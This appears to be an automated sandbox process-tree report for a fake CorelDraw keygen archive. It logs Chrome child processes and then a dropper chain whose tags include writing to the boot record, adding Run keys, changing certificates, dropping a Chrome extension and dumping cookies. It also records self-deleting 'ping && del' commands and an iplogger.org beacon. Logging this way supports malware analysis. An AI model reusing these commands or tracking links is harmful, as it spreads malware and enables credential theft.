C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4080 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6768 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7032 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5232 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7316 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5840 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5912 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4664 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7596 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4832 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4652 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1444,2935648513009689605,15827657744637126357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3716 /prefetch:82⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_CorelDraw_keygen_by_KeygenNinja.zip\CorelDraw_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_CorelDraw_keygen_by_KeygenNinja.zip\CorelDraw_keygen_by_KeygenNinja.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1613217354205.exe"C:\Users\Admin\AppData\Roaming\1613217354205.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613217354205.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1613217358815.exe"C:\Users\Admin\AppData\Roaming\1613217358815.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613217358815.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1613217364196.exe"C:\Users\Admin\AppData\Roaming\1613217364196.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613217364196.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2UI7D.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-2UI7D.tmp\23E04C4F32EF2158.tmp" /SL5="$800C8,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 48805⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\D5EE.tmp.exe"C:\Users\Admin\AppData\Roaming\D5EE.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\D5EE.tmp.exe"C:\Users\Admin\AppData\Roaming\D5EE.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\installer.exe"5⤵
- Executes dropped EXE
-
C:\ProgramData\2682116.29"C:\ProgramData\2682116.29"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 7247⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\2181628.23"C:\ProgramData\2181628.23"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\6320952.69"C:\ProgramData\6320952.69"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2B1DD597ECA8C29EE3940C17AED00ECF C2⤵
- Loads dropped DLL
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff999326e00,0x7ff999326e10,0x7ff999326e202⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1500 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1888 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2924 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1424 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,6663007799800771686,4089941146096086743,131072 --disable-gpu-compositing --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵
-
